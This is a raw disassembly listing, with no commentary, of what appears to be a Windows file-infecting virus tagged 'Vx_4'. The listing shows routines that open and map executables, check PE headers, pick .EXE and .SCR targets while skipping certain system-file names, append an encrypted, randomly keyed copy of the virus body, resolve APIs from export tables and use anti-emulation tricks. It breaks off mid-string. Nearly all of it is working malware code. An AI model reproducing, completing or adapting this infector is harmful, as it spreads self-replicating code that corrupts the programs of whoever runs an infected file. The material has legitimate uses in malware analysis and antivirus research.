; UPX2:3150D433�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_3150D32A
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_3150D32A
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_3150D8AB
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_3150D89F
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_3150D89F
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_3150D89F
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_3150D877
mov [ebp+1042B4h], eax
locret_3150D32A: ; CODE XREF: sub_3150D259+10�j
; sub_3150D259+27�j ...
retn
sub_3150D259 endp
; ---------------------------------------------------------------------------
loc_3150D32B: ; CODE XREF: sub_3150D45B+188�p
; sub_3150D45B+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ;
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_3150D370 proc near ; CODE XREF: sub_3150D45B:loc_3150D4D0�p
; sub_3150D45B+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_3150D375: ; CODE XREF: sub_3150D370+23�j
jecxz short locret_3150D3AC
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3150D3AC
cmp dword ptr [edx+0Ch], 1
jb short loc_3150D375
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_3150D3AC: ; CODE XREF: sub_3150D370:loc_3150D375�j
; sub_3150D370+1D�j ...
retn
sub_3150D370 endp
; =============== S U B R O U T I N E =======================================
sub_3150D3AD proc near ; CODE XREF: UPX2:3150D445�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3150D3AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3150D3BA: ; CODE XREF: UPX2:3150D3DB�j
mov ecx, edi
jmp short loc_3150D3C9
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_3150D3C5: ; CODE XREF: UPX2:3150D3D7�j
mov ebx, edi
xor ecx, ecx
loc_3150D3C9: ; CODE XREF: UPX2:3150D3BC�j
; UPX2:3150D3DF�j
lodsb
cmp al, 61h
jb short loc_3150D3D4
cmp al, 7Ah
ja short loc_3150D3D4
sub al, 20h
loc_3150D3D4: ; CODE XREF: UPX2:3150D3CC�j
; UPX2:3150D3D0�j
stosb
cmp al, 5Ch
jz short loc_3150D3C5
cmp al, 2Eh
jz short loc_3150D3BA
cmp al, 0
jnz short loc_3150D3C9
jecxz short locret_3150D3AC
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3150D3F7
cmp eax, 524353h
jnz locret_3150D32A
loc_3150D3F7: ; CODE XREF: UPX2:3150D3EA�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3150D32A
cmp eax, 4E554357h
jz locret_3150D32A
cmp eax, 32334357h
jz locret_3150D32A
cmp eax, 4F545350h
jz locret_3150D32A
xor ebx, ebx
call sub_3150D259
jnz short loc_3150D43E
call sub_3150D12D
call sub_3150D259
jz locret_3150D32A
loc_3150D43E: ; CODE XREF: UPX2:3150D42C�j
xor edx, edx
call sub_3150D45B
call sub_3150D3AD
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_3150D855
; =============== S U B R O U T I N E =======================================
sub_3150D45B proc near ; CODE XREF: UPX2:3150D440�p
var_1C = dword ptr -1Ch
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3150D855
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3150D855
test dword ptr [ebx+16h], 2000h
jnz loc_3150D855
test byte ptr [ebx+5Ch], 2
jz loc_3150D855
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_3150D855
cmp eax, 20202020h
jz loc_3150D855
mov ecx, [ebx+0C8h]
jecxz short loc_3150D4D0
push ecx
call near ptr dword_3150C410+4
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_3150D4D0: ; CODE XREF: sub_3150D45B+5D�j
call sub_3150D370
jb loc_3150D855
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_3150D4F0
xor eax, eax
jmp short loc_3150D4F5
; ---------------------------------------------------------------------------
loc_3150D4F0: ; CODE XREF: sub_3150D45B+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_3150D4F5: ; CODE XREF: sub_3150D45B+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_3150BB50+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_3150D517: ; CODE XREF: sub_3150D45B+D5�j
push 20h
dec cl
pop eax
js short loc_3150D532
call near ptr dword_3150BB50+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_3150D517
; ---------------------------------------------------------------------------
loc_3150D532: ; CODE XREF: sub_3150D45B+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_3150D560
test dword ptr [ebp+1039C0h], 3
jnz short loc_3150D556
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_3150D560
; ---------------------------------------------------------------------------
loc_3150D556: ; CODE XREF: sub_3150D45B+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_3150D560: ; CODE XREF: sub_3150D45B+E1�j
; sub_3150D45B+F9�j ...
push 6
pop ecx
loc_3150D566: ; CODE XREF: sub_3150D45B+129�j
push 6
pop eax
call near ptr dword_3150BB50+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_3150D566
test dword ptr [ebp+1039C0h], 8
jnz short loc_3150D59B
cmp byte ptr [ebp+1039BAh], 1
jz short loc_3150D560
loc_3150D59B: ; CODE XREF: sub_3150D45B+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3150D5C2
cmp byte ptr [ebp+1039B8h], 5
jz short loc_3150D560
cmp byte ptr [ebp+1039B9h], 5
jz short loc_3150D560
cmp byte ptr [ebp+1039BAh], 5
jz short loc_3150D560
loc_3150D5C2: ; CODE XREF: sub_3150D45B+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_3150D5D7
cmp byte ptr [ebp+1039B8h], 2
ja short loc_3150D560
loc_3150D5D7: ; CODE XREF: sub_3150D45B+171�j
and dword ptr [ebp+104300h], 0
call loc_3150C855
call loc_3150D32B
call sub_3150D85E
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_3150D259
jz loc_3150D855
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3150D370
jb loc_3150D855
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_3150D64B
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_3150D64B: ; CODE XREF: sub_3150D45B+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_3150D65F
rep movsb
loc_3150D65F: ; CODE XREF: sub_3150D45B+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_3150D71D
push dword ptr [ebx+28h]
call near ptr dword_3150C410+4
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_3150D71D
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3150D69C
xor ecx, ecx
loc_3150D69C: ; CODE XREF: sub_3150D45B+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_3150D703
mov edi, [esp+1Ch+var_1C]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_3150D6DC
neg dword ptr [eax]
loc_3150D6DC: ; CODE XREF: sub_3150D45B+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_3150D6FA
neg dword ptr [eax]
loc_3150D6FA: ; CODE XREF: sub_3150D45B+29B�j
push ecx
call loc_3150D32B
pop ecx
jmp short loc_3150D70F
; ---------------------------------------------------------------------------
loc_3150D703: ; CODE XREF: sub_3150D45B+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3150D70F: ; CODE XREF: sub_3150D45B+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_3150D71D: ; CODE XREF: sub_3150D45B+20E�j
; sub_3150D45B+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_3150D736
imul edx, 12345678h
loc_3150D736: ; CODE XREF: sub_3150D45B+2D3�j
mov [eax-19h], dx
call sub_3150B120
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_3150D768
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_3150D768: ; CODE XREF: sub_3150D45B+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_3150D784
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_3150D784: ; CODE XREF: sub_3150D45B+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_3150D797
push edx
call sub_3150CEF1
pop edx
loc_3150D797: ; CODE XREF: sub_3150D45B+333�j
mov ecx, [ebp+104300h]
jecxz short loc_3150D7A4
mov [ebx+28h], ecx
jmp short loc_3150D7B1
; ---------------------------------------------------------------------------
loc_3150D7A4: ; CODE XREF: sub_3150D45B+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_3150D7AE
jmp short loc_3150D7B1
; ---------------------------------------------------------------------------
loc_3150D7AE: ; CODE XREF: sub_3150D45B+34F�j
mov ecx, [ebx+28h]
loc_3150D7B1: ; CODE XREF: sub_3150D45B+347�j
; sub_3150D45B+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_3150D7D1
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_3150D7D1: ; CODE XREF: sub_3150D45B+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_3150D7E2
mov [edx+8], ecx
loc_3150D7E2: ; CODE XREF: sub_3150D45B+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_3150D813
add ecx, [ebp+101069h]
loc_3150D813: ; CODE XREF: sub_3150D45B+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_3150D835
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_3150D835
mov dh, [ebp+1039BFh]
loc_3150D835: ; CODE XREF: sub_3150D45B+3C4�j
; sub_3150D45B+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_3150D84C
loc_3150D841: ; CODE XREF: sub_3150D45B+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3150D841
jmp short loc_3150D855
; ---------------------------------------------------------------------------
loc_3150D84C: ; CODE XREF: sub_3150D45B+3E4�j
; sub_3150D45B+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3150D84C
loc_3150D855: ; CODE XREF: UPX2:3150D456�j
; sub_3150D45B+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3150D45B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150D85E proc near ; CODE XREF: sub_3150D45B+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_3150D32A
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_3150D877: ; CODE XREF: sub_3150D259+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_3150D89F: ; CODE XREF: sub_3150D259+6B�j
; sub_3150D259+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_3150D8AB: ; CODE XREF: sub_3150D259+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_3150D85E endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 1020607h, 2BAE0305h
dd 0FF2A6EE3h, 119415FFh, 0FF8B0100h, 59E85Bh, 648B0000h
dd 0EBB80824h, 0EB000004h, 0A16764FAh, 408B0018h, 40B60F30h
dd 0F88302h, 0E83C75h, 5D000000h, 2320ED81h, 858B0040h
dd 402367h, 236F8503h, 0F08B0040h, 236B858Bh, 85030040h
dd 40236Fh, 33FE8B50h, 8532ACC9h, 402377h, 8D3B41AAh, 402373h
dd 2BC3EF7Ch, 30FF64C0h, 0B8208964h, 12345678h, 60000387h
dd 84000000h, 0
dd 26003150h, 500000h, 105h dup(0)
dd 9B470000h, 8AD7C80h, 3317C83h, 7C91h, 1464h dup(0)
; ---------------------------------------------------------------------------
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_3151304D
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_31513041
mov ebx, [eax+29C1h]
jmp short loc_3151304B
; ---------------------------------------------------------------------------
loc_31513041: ; CODE XREF: UPX2:31513037�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_3151304B: ; CODE XREF: UPX2:3151303F�j
mov ebx, [ebx]
loc_3151304D: ; CODE XREF: UPX2:3151301F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 9E05h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0FFh
rep movsb
sldt cx
test ecx, ecx
jnz short loc_3151307B
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_3151307B: ; CODE XREF: UPX2:31513074�j
and ebx, 0FFFFF000h
loc_31513081: ; CODE XREF: UPX2:31513090�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_31513092
loc_3151308A: ; CODE XREF: UPX2:3151309F�j
sub ebx, 100h
jnz short loc_31513081
loc_31513092: ; CODE XREF: UPX2:31513088�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_3151308A
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_315130AC: ; CODE XREF: UPX2:loc_315130C0�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_315130C0
cmp dword ptr [eax+5], 6441636Fh
jz short loc_315130C5
loc_315130C0: ; CODE XREF: UPX2:315130B5�j
loop loc_315130AC
pop ecx
jmp short loc_315130F0
; ---------------------------------------------------------------------------
loc_315130C5: ; CODE XREF: UPX2:315130BE�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_31513137
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3151317E
loc_315130F0: ; CODE XREF: UPX2:315130C3�j
; sub_3151317E+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_3151311C
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_3151311C: ; CODE XREF: sub_3151317E-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_3151317E
; ---------------------------------------------------------------------------
dw 6970h
; =============== S U B R O U T I N E =======================================
sub_31513120 proc near ; CODE XREF: sub_3151545B+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_31513128: ; CODE XREF: sub_31513120+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_31513128
pop ebx
retn
sub_31513120 endp
; ---------------------------------------------------------------------------
loc_31513137: ; CODE XREF: UPX2:315130EE�j
call near ptr loc_31513146+2
inc ebx
insb
outsd
jnb short near ptr loc_315131A3+3
dec eax
popa
outsb
db 64h
insb
loc_31513146: ; CODE XREF: UPX2:loc_31513137�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_31513162+1
inc ebx
jb short loc_315131BE
popa
jz short near ptr loc_315131C0+1
inc ebp
jbe short near ptr loc_315131C0+4
outsb
jz short loc_315131A3
loc_31513162: ; CODE XREF: UPX2:31513151�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_3151317E
inc edi
db 65h
jz short near ptr loc_315131C0+1
popa
jnb short near ptr loc_315131EA+2
inc ebp
jb short near ptr loc_315131EA+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_3151317E proc near ; CODE XREF: UPX2:3151316C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 315130F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 31513534 SIZE 0000000B BYTES
push ebx
call esi ; rand
mov [ebp+103E6Ah], eax
call sub_3151355F
test eax, eax
jz loc_315130F0
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_31513534
loc_315131A3: ; CODE XREF: UPX2:31513160�j
; UPX2:3151313F�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_315131C0
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_315131BE: ; CODE XREF: UPX2:31513157�j
jmp short loc_315131C7
; ---------------------------------------------------------------------------
loc_315131C0: ; CODE XREF: sub_3151317E+2C�j
; UPX2:3151315A�j ...
and dword ptr [ebp+101598h], 0
loc_315131C7: ; CODE XREF: sub_3151317E:loc_315131BE�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_315131EA: ; CODE XREF: UPX2:31513176�j
; UPX2:31513179�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_3151359C
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_315132E3
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_31513534
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_31513534
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_31513534
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_315132D3
jmp loc_31513534
; ---------------------------------------------------------------------------
loc_315132D3: ; CODE XREF: sub_3151317E+14B�p
; sub_3151317E+162�j
push 0
pop ecx
jecxz short locret_315132E2
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_315132D3
; ---------------------------------------------------------------------------
locret_315132E2: ; CODE XREF: sub_3151317E+158�j
retn
; ---------------------------------------------------------------------------
loc_315132E3: ; CODE XREF: sub_3151317E+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_31513534
call near ptr loc_315132FA+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_315132FA: ; CODE XREF: sub_3151317E+172�p
add bh, bh
sub_3151317E endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_3151359C
cmp dword ptr [ebp+103F2Eh], 0
jz loc_31513534
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_31513534
mov ecx, [ebp+103F06h]
jecxz short loc_31513383
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_31513383
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_31513383: ; CODE XREF: UPX2:31513367�j
; UPX2:31513378�j
call sub_31513540
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_315133CC: ; CODE XREF: UPX2:315133D5�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_315133CC
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_31513534
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3151317E
loc_31513534: ; CODE XREF: sub_3151317E+1F�j
; sub_3151317E+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_315130F0
; END OF FUNCTION CHUNK FOR sub_3151317E
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31513540 proc near ; CODE XREF: UPX2:loc_31513383�p
; sub_3151355F+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_31513540 endp
; ---------------------------------------------------------------------------
aVx_4_0 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_3151355F proc near ; CODE XREF: sub_3151317E+9�p
xor ecx, ecx
call sub_31513540
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_3151355F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3328h, 0E73h, 1, 2 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_3151359C proc near ; CODE XREF: sub_3151317E+7C�p
; UPX2:31513312�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_315135A7: ; CODE XREF: sub_3151359C+E�j
lodsb
test al, al
jnz short loc_315135A7
loop sub_3151359C
retn
sub_3151359C endp
; =============== S U B R O U T I N E =======================================
sub_315135AF proc near ; CODE XREF: sub_3151512D+25�p
; FUNCTION CHUNK AT 31513639 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 31513A09 SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_315135DC+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_31513639
jbe short near ptr loc_31513639+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_31513640
inc ecx
loc_315135DC: ; CODE XREF: sub_315135AF+13�p
add [eax-1], dl
sub_315135AF endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
